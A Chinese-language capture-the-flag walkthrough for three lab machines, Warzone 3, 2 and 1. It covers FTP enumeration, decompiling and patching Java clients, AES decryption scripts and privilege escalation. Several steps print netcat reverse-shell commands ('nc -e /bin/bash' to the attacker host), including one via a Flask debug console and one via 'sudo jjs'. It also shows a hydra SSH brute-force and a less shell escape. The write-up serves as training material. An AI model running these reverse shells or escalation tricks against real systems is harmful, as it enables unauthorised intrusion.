WARZONE 3

WARZONE: 3

一、基本信息

名称:Warzone: 3

发布日期:2020.11.21

作者:AL1ENUM

系列:Warzone

推特: @AL1ENUM

二、靶机简介

Flags:

anunnaki:/~/underboss.txt
root:/root/boss.txt

难度:困难

三、文件信息

文件名:Warzone3.ova

文件大小:2.5GB

下载地址:

MD5: 3D82AB48E81BB31EE817EAECD8998747

SHA1: 8221A1683E3836903D050BF24E6E6601C72508B0

四、镜像信息

格式:Virtual Machine (Virtualbox - OVA)

操作系统:Linux(debain)

五、网络信息

DHCP服务:可用

IP地址:自动分配

六、环境配置

1.将靶机warzone3和攻击机kali2021在VirtualBox下设置为仅主机模式,使用DHCP分配ip地址:

image

七、攻略步骤

信息探测

1.因为是没有直接告知我们靶机ip的,所以要先进行主机探测,先查看下kali分配到的ip,在进行网段扫描,命令如下,得到靶机ip为192.168.56.102:

1
ifconfig,查看kali分配到的ip

image

1
nmap -sP 192.168.56.0/24,扫描靶机ip

image

2.再进行端口扫描,发现开放了21,22和4444端口,都是无法网页访问的:

1
nmap -T4 -sC -sV -p- --min-rate=1000 192.168.56.130 | tee nmapscan,端口扫描

image

FTP匿名登录

1.来到21端口,我们发现ftp服务可匿名登录:

1
2
ftp 192.168.56.130
anonymous

image

2.在/pub目录下我们能发现note.txt及alienclient.jar,全部获取到kali查看一下:

1
2
3
4
5
cd pub
ls -la
get note.txt
get alienclient.jar
quit

image

3.在note.txt中有用户名alienum和密码exogenesis:

1
cat note.txt

image

4.运行alienclient.jar,发现是一个登录器,输入用户密码登录并没有反应:

image

alienclient.jar反编修改

1.我们将alienclient.jar反编译回.java的组成(http://www.javadecompilers.com/),在Starter.java的actionPerformed方法中,判断用户权限时,由于存在本地鉴权问题,在判断用户权限前需添加一句role = “astronaut”;来提升权限:

1
2
3
4
5
if (e.getSource() == this.viewButton)
role = "astronaut"; /*代码修改处*/
if (Starter.role.equals("researcher")) {
JOptionPane.showMessageDialog(this, "Permission Denied");
} else if (role.equals("astronaut")) {

2.继续跟代码,发现reportList是执行代码list.setCmd(“tail -5 “ + f);,于是将它更改为list.setCmd(“nc -e /bin/bash 192.168.56.102 9002”);,并且将所有warzone.local改为靶机ip,重新编译成.jar,在kali开启对应端口监听,输入用户密码执行后,点击view:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
public void actionPerformed(final ActionEvent e) {
try {
Starter.this.socket = new Socket("warzone.local", 4444);
Starter.this.os = new ObjectOutputStream(Starter.this.socket.getOutputStream());
final RE list = new RE();
list.setToken(Starter.token);
list.setOption("VIEW");
list.setValue("VALUE");
list.setCmd("nc -e /bin/bash 192.168.56.102 9002"); /*代码修改处*/
Starter.this.os.writeObject(list);
Starter.this.is = new ObjectInputStream(Starter.this.socket.getInputStream());
final RE response = (RE)Starter.this.is.readObject();
Starter.this.os.close();
Starter.this.socket.close();
Starter.this.reportValue(response.getValue());
}

nc -lvnp 9002

image

image

初步提权

1.在exomorph用户目录下能够发现aliens.encrypted和wrz3encryptor.jar,都获取到kali:

1
2
3
4
5
6
cd ~
ls -la
python3 -m http.server 8001,exomorph开放http服务

wget http://192.168.56.130:8001/aliens.encrypted,kali获取
wget http://192.168.56.130:8001/wrz3encryptor.jar

image

image

2.再次对wrz3encryptor.jar进行反编,然后发现是AES的加密,可以写出解密方法:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
public static void decrypt(String key, File inputFile, File outputFile) {
doDeCrypto(2, key, inputFile, outputFile);
}

private static void doDeCrypto(int cipherMode, String key, File inputFile, File outputFile) {
try {
Key secretKey = new SecretKeySpec(key.getBytes(), "AES");
Cipher cipher = Cipher.getInstance("AES");
cipher.init(cipherMode, secretKey);
FileInputStream inputStream = new FileInputStream(inputFile);
byte[] inputBytes = new byte[(int)inputFile.length()];
inputStream.read(inputBytes);
byte[] outputBytes = cipher.doFinal(inputBytes);
FileOutputStream outputStream = new FileOutputStream(outputFile);
outputStream.write(outputBytes);
inputStream.close();
outputStream.close();
} catch (Exception ex) {
ex.printStackTrace();
}
}

3.对aliens.encrypted进行解密后,我们可以发现anunnaki用户及其密码:

image

4.可以通过ssh登录anunnaki用户,在用户目录下获得第一个flag,underboss.txt:

image

root提权

1.在/home/anunnaki目录下还可以发现secpasskeeper.jar.gpg文件,利用gpg解密:

1
gpg -o secpasskeeper.jar -d secpasskeeper.jar.gpg #passphrase为nak1nak1..

image

2.解密后能得到secpasskeeper.jar文件,继续对其反编后,修改main方法:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
public class Main {
public static void main(String[] args) throws InvalidKeyException, NoSuchPaddingException, NoSuchAlgorithmException, BadPaddingException, IllegalBlockSizeException, UnsupportedEncodingException {
try {
Scanner in = new Scanner(System.in);
System.out.println("[Warzone 3] Root's Password Manager");
System.out.print("Secret passphrase : ");
String secret = in.nextLine();
Cryptor cryptor = new Cryptor();
Resources res = new Resources();
String user = cryptor.decrypt(secret, removeSalt(res.getCipher()));
String sys = cryptor.decrypt(cryptor.decrypt(res.gotSecret(), removeSalt(res.getSecret())), removeSalt(res.getCipher()));
if (true/*user.equals(sys)*/) { /*代码修改处*/
String plaintext = cryptor.decrypt(cryptor.decrypt(res.gotSecret(), removeSalt(res.getSecret())), removeSalt(res.getCipher()));
System.out.println("[+] Success, the password is : " + plaintext);
} else {
System.out.println("[x] Failed");
}
} catch (NullPointerException n) {
System.out.println("[!] Terminated");
System.exit(0);
}
}

3.随意传递参数输入,可以得到root的密码为ufo_phosXEN,现在可以提权到root,并且在/root目录下发现第二个flag,boss.txt:

1
2
3
4
su root
cd /root
ls -la
cat boss.txt

image

WARZONE 2

WARZONE: 2

一、基本信息

名称:Warzone: 2

发布日期:2020.11.9

作者:AL1ENUM

系列:Warzone

推特: @AL1ENUM

二、靶机简介

Flags:

admiral:/~/Desktop/silver.txt
root:/root/Desktop/gold.txt

难度:中等

三、文件信息

文件名:Warzone2.ova

文件大小:2.6GB

下载地址:

MD5: FF639B25FB64A049E094FC20F51B732C

SHA1: E5B5CADF476129CC365EDF58C5855497B97F1AA5

四、镜像信息

格式:Virtual Machine (Virtualbox - OVA)

操作系统:Linux(debain)

五、网络信息

DHCP服务:可用

IP地址:自动分配

六、环境配置

1.将靶机warzone2和攻击机kali2021在VirtualBox下设置为仅主机模式,使用DHCP分配ip地址:

image

七、攻略步骤

信息探测

1.因为是没有直接告知我们靶机ip的,所以要先进行主机探测,先查看下kali分配到的ip,在进行网段扫描,命令如下,得到靶机ip为192.168.56.102:

1
>ifconfig,查看kali分配到的ip

image

1
>nmap -sP 192.168.56.0/24,扫描靶机ip

image

2.再进行端口扫描,发现开放了21,22和1337端口,都是无法网页访问的:

1
>nmap -T4 -sC -sV -p- --min-rate=1000 192.168.56.129 | tee nmapscan,端口扫描

image

FTP匿名登录

1.来到21端口,我们发现ftp服务可匿名登录:

1
2
ftp 192.168.56.129
anonymous

image

2.在/anon目录下我们能发现username.PNG,password.PNG及token.PNG,全部获取到kali查看一下:

1
2
3
4
5
6
cd anon
ls -la
get username.PNG
get password.PNG
get token.PNG
quit

image

image

image

image

3.在网络上查询旗语的指代,可以得到用户名为semaphore,密码为signalperson,然后进行sha256加密再转hex后得到token为833ad488464de1a27d512f104b639258e77901f14eab706163063d34054a7b26,可以远程链接1337端口:

1
nc 192.168.56.129 1337

image

4.可以在kali开启对应的端口监听,获取shell:

1
2
3
nc -e /bin/bash 192.168.56.102 1234,靶机返回shell

nc -lvnp 1234,kali开启监听

image

初步提权

1.在/flagman目录下我们能发现一个warzone2-socket-server目录,在其中的.mysshpassword文件可以发现flagman的ssh登录密码,可以登录到flagman:

image

image

2.在flagman用户下利用sudo -l命令能发现admiral用户能够执行wrz2-app.py,而flagman无权读写该文件:

image

3.运行wrz2-app.py发现程序在5000端口起了一个flask,并且开启了debug和输出了pin码:

1
sudo -u admiral /usr/bin/python3 /home/admiral/warzone2-app/wrz2-app.py

image

4.那么我们就要尝试在debug中获取反弹shell,获取用户admiral权限。由于监听在地址127.0.0.1,这里使用socat做了一个端口转发:

1
2
3
socat TCP4-LISTEN:15000,reuseaddr,fork TCP4:127.0.0.1:5000

sudo -u admiral /usr/bin/python3 /home/admiral/warzone2-app/wrz2-app.py,再开启一个窗口链接flagman执行wrz2-app.py

image

5.访问192.168.56.129:15000/console,输入wrz2-app.py生成的PIN,构造shell,在kali开启对应端口监听,成功反弹:

1
2
3
4
import os
os.system('nc -e /bin/bash 192.168.56.102 9002')

nc -lvnp 9002

image

image

6.在/home/admiral/Desktop目录下,我们能获得第一个flag,silver.txt:

1
2
3
cd ~/Desktop
ls -la
cat silver.txt

image

root提权

1.再通过sudo -l命令,可以看到less可以执行特权命令:

1
sudo -l

image

2.那我们可以直接使用less进行提权:

1
2
sudo -u root /usr/bin/less /var/public/warzone-rules.txt
:!id,在warzone-rules.txt编辑页输入

image

image

3.成功提权到root,并可以在/root/Desktop下发现第二个flag,gold.txt:

1
2
sudo -u root /usr/bin/less /var/public/warzone-rules.txt
cat /root/Desktop/gold.txt

image

WARZONE 1

WARZONE: 1

一、基本信息

名称:Warzone: 1

发布日期:2020.10.24

作者:AL1ENUM

系列:Warzone

推特: @AL1ENUM

二、靶机简介

Flags:

captain:/~/Desktop/user.txt
root:/root/Desktop/root.txt

难度:中等

三、文件信息

文件名:Warzone.ova

文件大小:2.2GB

下载地址:

MD5: 98FC0985C32A2380A0AFBF24222C22D5

SHA1: 0FB9DBC8D8516B462C4E1C8735D41B01D57F2B35

四、镜像信息

格式:Virtual Machine (Virtualbox - OVA)

操作系统:Linux(debain)

五、网络信息

DHCP服务:可用

IP地址:自动分配

六、环境配置

1.将靶机warzone1和攻击机kali2021在VirtualBox下设置为仅主机模式,使用DHCP分配ip地址:

image

七、攻略步骤

信息探测

1.因为是没有直接告知我们靶机ip的,所以要先进行主机探测,先查看下kali分配到的ip,在进行网段扫描,命令如下,得到靶机ip为192.168.56.102:

1
>ifconfig,查看kali分配到的ip

image

1
>nmap -sP 192.168.56.0/24,扫描靶机ip

image

2.再进行端口扫描,发现开放了21,22和5000端口,访问5000端口,发现栅栏密码:

1
>nmap -T4 -sC -sV -p- --min-rate=1000 192.168.56.128 | tee nmapscan,端口扫描

image

image

3.最后再进行一下目录扫描,没有太多值得关注的信息:

1
>gobuster dir -u http://192.168.56.128:5000 -x html,php,bak,txt --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt,目录扫描

image

页面信息获取

1.栅栏密码的原文应该是Its a warzone,加密后变成Iwotaaznsre,将源码中的字串解密(http://www.atoolbox.net/Tool.php?Id=777)得到路径:

image

2.访问页面路径,得到8个用户及对应密码加密,加密字段无法用base64直接解开:

image

FTP匿名登录

1.来到21端口,我们发现ftp服务可匿名登录:

1
2
ftp 192.168.56.128
anonymous

image

2.在/pub目录下我们能发现note.txt,提示我们密码都是用warzone-encrypt.jar进行加密的:

1
2
3
4
5
6
cd pub
ls -la
get note.txt
get warzone-encrypt.jar
quit
cat note.txt

image

image

jar加密算法反解

1.查看warzone-encrypt.jar,发现是用AES对密码进行加密的,这样的话我们依加密算法写出解密算法即可:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
Main.java

package encrypt;

import java.util.Base64;
import java.util.Scanner;
import Other.Obfuscated;
import crypto.AES;

public class Main {
public static String decrypt(String encryptpasswd) {
Obfuscated obs = new Obfuscated();
AES ea = new AES(obs.getIV(), 128, obs.getKey());
try {
ea.cipher.init(2, ea.key, ea.iv);
byte[] encryptbytes = Base64.getDecoder().decode(encryptpasswd);
byte[] decryptbytes = ea.cipher.doFinal(encryptbytes);
return new String(decryptbytes);
} catch (Exception ex) {
throw new RuntimeException(ex.getMessage());
}
}

public static void main(String[] args) {
while (true) {
Scanner in = new Scanner(System.in);
System.out.print("enter the encryptpassword to decrypt : ");
String encryptpassword = in.nextLine();
System.out.println("password : " + decrypt(encryptpassword));
}
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
AES.java

package crypto;

import Other.Obfuscated;
import java.security.Key;
import java.security.MessageDigest;
import java.util.Base64;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

public class AES {
public static final IvParameterSpec DEFAULT_IV = new IvParameterSpec(new byte[19]);
public static final String ALGORITHM = "AES";
public static final String TRANSFORMATION = "AES/CBC/PKCS5Padding";
public Key key;
public IvParameterSpec iv;
public Cipher cipher;
public AES(String key) {
this(key, 128);
}

public AES(String key, int bit) {
this(key, bit, null);
}

public AES(String key, int bit, String iv) {
if (bit == 256) {
this.key = new SecretKeySpec(getHash("SHA-256", key), "AES");
} else {
this.key = new SecretKeySpec(getHash("MD5", key), "AES");
}
if (iv != null) {
this.iv = new IvParameterSpec(getHash("MD5", iv));
} else {
this.iv = DEFAULT_IV;
}
init();
}

public static byte[] getHash(String algorithm, String text) {
try {
return getHash(algorithm, text.getBytes("UTF-8"));
} catch (Exception ex) {
throw new RuntimeException(ex.getMessage());
}
}

public static byte[] getHash(String algorithm, byte[] data) {
try {
MessageDigest digest = MessageDigest.getInstance(algorithm);
digest.update(data);
return digest.digest();
} catch (Exception ex) {
throw new RuntimeException(ex.getMessage());
}
}

public void init() {
try {
this.cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
} catch (Exception ex) {
throw new RuntimeException(ex.getMessage());
}
}

public String encrypt(String str) {
try {
return encrypt(str.getBytes("UTF-8"));
} catch (Exception ex) {
throw new RuntimeException(ex.getMessage());
}
}

public String encrypt(byte[] data) {
try {
this.cipher.init(1, this.key, this.iv);
byte[] encryptData = this.cipher.doFinal(data);
return new String(Base64.getEncoder().encode(encryptData));
} catch (Exception ex) {
throw new RuntimeException(ex.getMessage());
}
}

public static String encryptString(String content) {
Obfuscated obs = new Obfuscated();
AES ea = new AES(obs.getIV(), 128, obs.getKey());
return ea.encrypt(content);
}
}
1
2
3
4
5
6
7
8
9
10
11
12
Obfuscated.java
package Other;

public class Obfuscated {
public String getIV() {
return "w4rz0n3s3cur31vv";
}

public String getKey() {
return "w4rz0n3s3cur3k3y";
}
}

2.将用户和加密后密码输入得到对应的用户及解密密码字典,利用hydra进行ssh爆破:

1
hydra -L user.dic -P pass.dic ssh://192.168.56.128

image

初步提权

1.ssh登录commando用户,查看历史:

1
2
3
ssh commando@192.168.56.128

cat .bash_history

image

2.可以发现/home/captain/Desktop目录下有user.txt,但我们无权查看:

1
2
3
cd /home/captain/Desktop
ls -la
cat user.txt

image

3.在/.crypt目录下能发现readme.txt,readme.txt提醒密码就在这里,还有一段加密程序encrypt.py和.c:

1
2
3
cd .crypt
ls -la
cat readme.txt

image

4.查看encrypt.py,.c和script.sh,我们能够知道script.sh是将参数输入encrypt.py后由encrypt.py加密生成.c中的字串,我们可以写一个解密程序,将captain用户的密码解密出来:

1
2
3
cat encrypt.py
cat .c
cat script.sh

image

1
2
3
4
5
6
7
8
9
10
11
pip3 install simple-crypt

#!/usr/bin/python3
from simplecrypt import encrypt, decrypt
import os
import base64

key = 'sekret'
text = base64.b64decode('c2MAAk1Y/hAsEsn+FasElyXvGSI0JxD+n/SCtXbHNM+1/YEU54DO0EQRDfD3wz/lrbkXEBJJJd1ylXZpi/2dopaklmG6NCAXfGKl1eWAUNU1Iw==')
passwd = decrypt(key, text)
print(passwd)

image

5.登录到captain用户,可以查看第一个flag,user.txt:

1
2
cd ..
cat user.txt

image

root提权

1.通过sudo -l命令,可以看到jjs(jjs是让javascript可以调用java)可以执行特权命令:

1
sudo -l

image

2.那我们可以写一个java的shell提权利用js去调用再使用jjs去执行:

1
echo "Java.type('java.lang.Runtime').getRuntime().exec('/usr/bin/nc -e /bin/bash 192.168.56.102 1234')"|sudo jjs

image

3.成功提权到root,并可以在/root/Desktop下发现第二个flag,root.txt:

1
2
3
cd /root/Desktop
ls -la
cat root.txt

image